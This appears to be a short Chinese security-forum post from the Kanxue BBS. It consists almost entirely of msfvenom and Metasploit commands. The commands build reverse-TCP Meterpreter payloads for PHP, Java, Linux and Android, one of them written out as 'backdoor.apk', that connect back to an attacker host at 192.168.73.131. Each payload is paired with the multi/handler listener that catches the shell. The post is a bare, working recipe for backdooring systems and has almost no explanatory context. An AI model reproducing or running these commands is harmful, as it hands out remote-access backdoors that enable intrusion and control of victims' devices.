爆破过程
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php
search exploit/hanler
use exploit/multi/handler
show options
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp
exploit
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
1. 示例指令:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
search exploit/hanler
use exploit/multi/handler
show options
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp
exploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk
search exploit/hanler
use exploit/multi/handler
show options
set LHOST 192.168.73.131
set LPORT 5555
set payload android/meterpreter/reverse_tcp
exploit
看雪ID:Lǎn māo
https://bbs.pediy.com/user-828426.htm
推荐文章++++